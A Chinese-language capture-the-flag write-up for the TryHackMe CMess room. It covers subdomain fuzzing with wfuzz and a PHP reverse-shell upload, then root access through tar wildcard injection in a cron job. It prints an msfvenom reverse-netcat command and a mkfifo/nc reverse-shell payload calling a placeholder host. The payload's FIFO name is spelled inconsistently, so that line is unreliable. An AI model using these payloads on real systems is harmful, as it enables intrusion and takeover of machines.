TryHackMe-CMess

atsud0

2020-06-14

信息收集

nmap扫描

首先把ip cmess.thm的域名添加上/etc/hosts，先爆破子域名（因为看到了提示…

1	wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm/" -H "Host: FUZZ.cmess.thm" --hl 107

wfuzz 爆破子域后，将被爆破出来的子域名添加上/etc/hosts上

脆弱利用

通过找到的帐号密码，登录上来后搜索一番，找到了上传路径（没有任何过滤的。上传一句话或者是php-reverse-shell，连接上去后。发现andre用户是没有权限进去的，搜索属于该用户的文件也没找到有价值的东西，最后在/opt下面发现了一个奇怪的文件。。找到andre的密码，可以直接ssh连接上去了。

1	user-flag：*{******************************}

提权

查看sudo -l无果，但是在/etc/crontab下看到了这个定时任务。有通配符的tar~

tar wildcar注入走起~Linux提权方式

第三个的payload，替换成自己用msfvenom生成的payload

1	msfvenom -p cmd/unix/reverse_netcat LHOST=your_ip LPORT=8888 R

payload

cd /var/www/html/
echo "">"--checkpoint-action=exec=sh shell.sh"
echo "">"--checkpoint=1"
echo "mkfifo /tmp/cflw;nc your_ip 8888 0</tmp/clfw |/bin/sh >/tmp/cflw 2>&1">shell.sh

倒杯茶，等待两分钟。你就能拿到root权限了

拿到root权限

1	root-flag:*{******************************}

总结

学习了一下wfuzz的基本使用，顺带复习了tar通配符提权。